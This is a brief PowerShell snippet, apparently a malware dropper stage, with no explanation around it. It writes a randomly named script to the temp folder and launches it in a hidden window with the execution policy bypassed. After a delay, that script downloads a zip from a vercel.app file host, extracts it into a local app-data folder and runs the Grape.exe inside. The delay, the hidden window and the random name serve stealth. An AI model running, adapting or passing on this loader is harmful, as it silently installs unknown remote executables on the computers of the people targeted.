# Write downloader to disk, launch hidden with -File $dl = "$env:TEMP\" + [System.IO.Path]::GetRandomFileName().Split('.')[0] + ".ps1" $payload = @' sleep 30 $ProgressPreference = 'SilentlyContinue' $z = [System.IO.Path]::GetTempFileName() + ".zip" $d = "$env:LOCALAPPDATA\jsDownload" Invoke-WebRequest -Uri https://file-host-alpha.vercel.app/Grape2.zip -OutFile $z -UseBasicParsing if (-not (Test-Path $d)) { New-Item -ItemType Directory -Path $d -Force | Out-Null } tar.exe -xf $z -C $d Remove-Item $z -Force if (Test-Path "$d\Grape.exe") { & "$d\Grape.exe" } '@ [System.IO.File]::WriteAllText($dl, $payload) Start-Process powershell -WindowStyle Hidden -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$dl`""